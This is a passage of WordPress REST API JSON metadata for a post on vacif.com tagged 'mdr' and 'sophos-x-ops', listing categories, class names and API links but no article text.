categories":[80,10],"tags":[497,493],"class_list":["post-20428","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-huong-dan-tai-lieu","category-tin-tuc","tag-mdr","tag-sophos-x-ops","entry","has-media"],"_links":{"self":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts\/20428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/users\/13"}],"replies":[{"embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/comments?post=20428"}],"version-history":[{"count":1,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts\/20428\/revisions"}],"predecessor-version":[{"id":20578,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts\/20428\/revisions\/20578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/media\/20568"}],"wp:attachment":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/media?parent=20428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/categories?post=20428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/tags?post=20428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}